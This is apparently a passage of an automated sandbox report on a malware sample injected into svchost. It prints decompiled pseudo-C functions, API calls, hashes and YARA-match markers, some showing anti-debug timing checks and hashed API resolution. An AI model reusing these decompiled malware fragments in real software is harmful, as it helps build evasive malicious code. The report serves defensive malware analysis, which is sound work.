                                          • Instruction ID: 0e728cfbe53f4eeaf03282aad55e1cdffbbad38007502003df8870f85b36c90c
                                          • Opcode Fuzzy Hash: 031ebef30c1e922ca0db4c9d3a493dead983ecb4cc7dcc279cf27af94c9a8e28
                                          • Instruction Fuzzy Hash: 4A9002712010CC02E110A169884874A10059BD0341F55C412A4415658D87D588917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
                                          • Instruction ID: 625084e0ae489f028e239da245256bd2972142c7e5dd55cda0d16637b609f40a
                                          • Opcode Fuzzy Hash: 704ae5591a5937ba29dcb2a3caaeb3d5effd30f2ac25d3c5af8e68ec575a105b
                                          • Instruction Fuzzy Hash: 5190027120104C02E180B169484864A10059BD1341F91C016A0016654DCB558A5977F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
                                          • Instruction ID: a21c7100f66e6dbc31690d306647cedb605f27b7f832af482bbd0149157da482
                                          • Opcode Fuzzy Hash: ce702b2a2fab6dbd77eb79762bf50ce841c2ae36a6b66396845fda1cfa4ede7e
                                          • Instruction Fuzzy Hash: 809002A1202044035105B1694858616500A9BE0241B51C022E1005590DC66588917175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A69540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
                                          • Instruction ID: f1908b52dd07e4782c4bc79afb7e865991fcc99e18ea6179c72111d84ded709f
                                          • Opcode Fuzzy Hash: d040720c37b6ba41e69ce8245c94e90683b809bab259f7d45b7634a5f0e08d39
                                          • Instruction Fuzzy Hash: B6900265211044031105E5690B4850710469BD5391351C022F1006550CD76188616171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00409AA0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407EA0(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E004080B0( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BE00( &_v284, 0x104);
						E0041C470( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DE0(E00414D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080E0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408160(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                          0x00409aab
                                          0x00409ab3
                                          0x00409ab5
                                          0x00409aba
                                          0x00409abf
                                          0x00409ad2
                                          0x00409ad7
                                          0x00409ae0
                                          0x00409aec
                                          0x00409aff
                                          0x00409b04
                                          0x00409b07
                                          0x00409b10
                                          0x00409b22
                                          0x00409b27
                                          0x00409b2c
                                          0x00000000
                                          0x00000000
                                          0x00409b2e
                                          0x00409b32
                                          0x00000000
                                          0x00000000
                                          0x00409b34
                                          0x00000000
                                          0x00409b32
                                          0x00409b36
                                          0x00409b39
                                          0x00409b3f
                                          0x00409b41
                                          0x00409b4c
                                          0x00409b51
                                          0x00409b54
                                          0x00409b61
                                          0x00409b6c
                                          0x00409b6e
                                          0x00409b74
                                          0x00409b78
                                          0x00409b7b
                                          0x00409b7b
                                          0x00409b82
                                          0x00409b85
                                          0x00409b8a
                                          0x00409b97
                                          0x00409ac6
                                          0x00409ac6
                                          0x00409ac6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                          • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                          • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                          • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A620 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6 41a620-41a651 call 41af50 RtlAllocateHeap
                                          C-Code - Quality: 100%
                                          			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x414526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a637
                                          0x0041a642
                                          0x0041a64d
                                          0x0041a651

                                          APIs
                                          • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: &EA
                                          • API String ID: 1279760036-1330915590
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408308 Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 204 408308-40835a call 41be50 call 41c9f0 call 40ace0 call 414e40 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a470 213->215 216 40838d 213->216 215->216 216->214
                                          C-Code - Quality: 68%
                                          			E00408308(signed int __eax, void* __edi, long _a8) {
				char _v63;
				char _v64;
				void* _t14;
				int _t15;
				long _t22;
				int _t27;
				void* _t30;
				void* _t32;
				signed int _t37;

				_pop(_t32);
				 *__eax = __edi;
				_t37 = __eax | 0x5540d146;
				_t30 = _t32;
				_v64 = 0;
				E0041BE50( &_v63, 0, 0x3f);
				E0041C9F0( &_v64, 3);
				_t14 = E0040ACE0(_t37, _a8 + 0x1c,  &_v64); // executed
				_t15 = E00414E40(_a8 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t27 = _t15;
				if(_t27 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t15 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t39 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t27(_t22, 0x8003, _t30 + (E0040A470(_t39, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}












                                          0x00408308
                                          0x00408309
                                          0x0040830b
                                          0x00408311
                                          0x0040831f
                                          0x00408323
                                          0x0040832e
                                          0x0040833e
                                          0x0040834e
                                          0x00408353
                                          0x0040835a
                                          0x0040835c
                                          0x0040835d
                                          0x0040836a
                                          0x0040836c
                                          0x0040836e
                                          0x0040838b
                                          0x0040838b
                                          0x0040838d
                                          0x00408392

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 2756fa22d27b99dada59a7298bb8f6c1ccdbc0b4c48fb34e1a2a1a3163925503
                                          • Instruction ID: 2a3ed26db6d6e2ef49687d0a57fd7b92a573dea4e3aab1cde647026de5e34bd2
                                          • Opcode Fuzzy Hash: 2756fa22d27b99dada59a7298bb8f6c1ccdbc0b4c48fb34e1a2a1a3163925503
                                          • Instruction Fuzzy Hash: EE01D871A8031877E720AA958C43FFE776C6B40F54F05012AFF04BA1C2E6B8690547EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 219 408310-40831f 220 408328-40835a call 41c9f0 call 40ace0 call 414e40 219->220 221 408323 call 41be50 219->221 228 40835c-40836e PostThreadMessageW 220->228 229 40838e-408392 220->229 221->220 230 408370-40838a call 40a470 228->230 231 40838d 228->231 230->231 231->229
                                          C-Code - Quality: 82%
                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BE50( &_v67, 0, 0x3f);
				E0041C9F0( &_v68, 3);
				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                          0x00408310
                                          0x0040831f
                                          0x00408323
                                          0x0040832e
                                          0x0040833e
                                          0x0040834e
                                          0x00408353
                                          0x0040835a
                                          0x0040835d
                                          0x0040836a
                                          0x0040836c
                                          0x0040836e
                                          0x0040838b
                                          0x0040838b
                                          0x00000000
                                          0x0040838d
                                          0x00408392

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                          • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                          • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                          • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A652 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 258 41a652-41a677 call 41af50 260 41a67c-41a691 RtlFreeHeap 258->260
                                          C-Code - Quality: 44%
                                          			E0041A652(void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t10;
				void* _t15;

				asm("das");
				_push(0x9b195d8e);
				asm("rcr dword [fs:0x6c4217ac], 1");
				asm("sbb edx, [ebp-0x75]");
				_t7 = _v0;
				_t3 = _t7 + 0xc74; // 0xc74
				E0041AF50(_t15, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t10;
			}






                                          0x0041a652
                                          0x0041a653
                                          0x0041a658
                                          0x0041a65f
                                          0x0041a663
                                          0x0041a66f
                                          0x0041a677
                                          0x0041a68d
                                          0x0041a691

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 6a60e7526f36b329245ac188d20a79f8aa7320dd115fd1b9488f38e82a51bc06
                                          • Instruction ID: 1ad8e7c7d70bf9bb0bb0520b27fd8a2aa8f0e885a6bed952aff7142781adbae4
                                          • Opcode Fuzzy Hash: 6a60e7526f36b329245ac188d20a79f8aa7320dd115fd1b9488f38e82a51bc06
                                          • Instruction Fuzzy Hash: B3E06DB5600604BFC728DF69DC45ED777A9EF88754F108659F91D97241C631E814CEA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 261 41a660-41a676 262 41a67c-41a691 RtlFreeHeap 261->262 263 41a677 call 41af50 261->263 263->262
                                          C-Code - Quality: 100%
                                          			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a66f
                                          0x0041a677
                                          0x0041a68d
                                          0x0041a691

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 264 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                          C-Code - Quality: 100%
                                          			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a7da
                                          0x0041a7f0
                                          0x0041a7f4

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A692 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 267 41a692-41a6c8 call 41af50 ExitProcess
                                          C-Code - Quality: 58%
                                          			E0041A692(intOrPtr _a4, int _a8) {
				signed int _t15;
				void* _t17;

				asm("cli");
				_t17 = (_t15 ^ 0x0f3a5825) - 1;
				asm("lds esi, [edx+0x55]");
				_t7 = _a4;
				E0041AF50(_t17, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}





                                          0x0041a692
                                          0x0041a69d
                                          0x0041a69e
                                          0x0041a6a3
                                          0x0041a6ba
                                          0x0041a6c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: cecb18a471669382d0dfb0dff63648774b2727865299a3c57685def264c92321
                                          • Instruction ID: 01fc8669155236cb77b8e86bae022ab97e791939009f35e61c1a55cdbd4ec333
                                          • Opcode Fuzzy Hash: cecb18a471669382d0dfb0dff63648774b2727865299a3c57685def264c92321
                                          • Instruction Fuzzy Hash: A8E086756052006BD728DB59CC55FD73BA8EF8C350F068094B91D6F343C531E941C6D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                          0x0041a6a3
                                          0x0041a6ba
                                          0x0041a6c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434333688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A6967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                                          • Instruction ID: d73c0bc47b361db7377fbea3dba4d41e0c23f8612a4cf06d937b75982474fef6
                                          • Opcode Fuzzy Hash: 1395441de9038e2093353973c792fffe9a948608f1fcffd2da4048a11014078e
                                          • Instruction Fuzzy Hash: 3BB09B719015C5C5E611D7704B0C71779047BD0741F16C057D1020641A477CC091F5B6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 03ADB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 03ADB53F
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 03ADB305
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 03ADB2DC
                                          • write to, xrefs: 03ADB4A6
                                          • The critical section is owned by thread %p., xrefs: 03ADB3B9
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03ADB3D6
                                          • Go determine why that thread has not released the critical section., xrefs: 03ADB3C5
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 03ADB39B
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 03ADB484
                                          • *** Inpage error in %ws:%s, xrefs: 03ADB418
                                          • <unknown>, xrefs: 03ADB27E, 03ADB2D1, 03ADB350, 03ADB399, 03ADB417, 03ADB48E
                                          • *** enter .exr %p for the exception record, xrefs: 03ADB4F1
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 03ADB48F
                                          • *** enter .cxr %p for the context, xrefs: 03ADB50D
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 03ADB352
                                          • The instruction at %p tried to %s , xrefs: 03ADB4B6
                                          • *** then kb to get the faulting stack, xrefs: 03ADB51C
                                          • The resource is owned shared by %d threads, xrefs: 03ADB37E
                                          • read from, xrefs: 03ADB4AD, 03ADB4B2
                                          • an invalid address, %p, xrefs: 03ADB4CF
                                          • The instruction at %p referenced memory at %p., xrefs: 03ADB432
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 03ADB38F
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 03ADB323
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 03ADB47D
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 03ADB314
                                          • a NULL pointer, xrefs: 03ADB4E0
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 03ADB2F3
                                          • The resource is owned exclusively by thread %p, xrefs: 03ADB374
                                          • This failed because of error %Ix., xrefs: 03ADB446
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 03ADB476
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: d963b0b64c94894713a2eea87087f107c1ba5c6524ca746d29ebae299192a6c0
                                          • Instruction ID: 6431faa4333e5f2f379b192257d8981c764b02bf1cedb4a77de79d8a768f41d2
                                          • Opcode Fuzzy Hash: d963b0b64c94894713a2eea87087f107c1ba5c6524ca746d29ebae299192a6c0
                                          • Instruction Fuzzy Hash: A081D179A40210FFCB26DF098C45DBF3B3AAF57A51B06004BF4162F613D2668561D6B2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AE1C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E03AE1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x3a048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E03A2B150();
				} else {
					E03A2B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x3b1589c);
				E03A2B150("Heap error detected at %p (heap handle %p)\n",  *0x3b158a0);
				_t27 =  *0x3b15898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03AE1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
